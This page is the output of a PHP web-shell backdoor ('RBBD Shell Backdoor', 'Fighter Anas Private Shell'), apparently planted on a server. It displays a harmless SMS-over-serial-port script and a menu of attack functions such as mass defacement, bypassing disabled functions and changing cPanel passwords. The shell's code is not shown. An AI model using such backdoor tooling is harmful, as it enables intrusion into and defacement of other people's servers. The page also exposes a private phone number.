⚜ RBBD Shell Backdoor ⚜
Current Dir
:
D:
/
php
/
send_test
/
Home
Upload
Command
Config
Jumping
Symlink
Mass Deface
Bypass Disable Function
K-RDP 5H3LL
Adminer
Change Password cPanel
Zone-H
Current File : D:/php/send_test/send_test.php
<?php include "php_serial.class.php"; // Let's start the class $serial = new phpSerial; // First we must specify the device. This works on both linux and windows (if // your linux serial device is /dev/ttyS0 for COM1, etc) $serial->deviceSet("COM3"); // We can change the baud rate, parity, length, stop bits, flow control $serial->confBaudRate(115200); $serial->confParity("none"); $serial->confCharacterLength(8); $serial->confStopBits(1); $serial->confFlowControl("none"); // Then we need to open it $serial->deviceOpen(); // To write into $serial->sendMessage("AT+CMGF=1\n\r"); $serial->sendMessage("AT+cmgs=\"+420604705850\"\n\r"); sleep(3); $//serial->sendMessage("Hi, This is the sms that I sent to you using PHP script with serial Port communication with my phone as serial device!! GN - VKSALIAN \n\r"); $serial->sendMessage("Hello, how are you? \n\r"); $serial->sendMessage(chr(26)); //wait for modem to send message sleep(7); // Or to read from $read = $serial->readPort(); echo $read; // If you want to change the configuration, the device must be closed $serial->deviceClose(); // etc... ?>
Fighter Anas Private Shell V.1 -
Royal
Battler BD
Copyright © Fighter Anas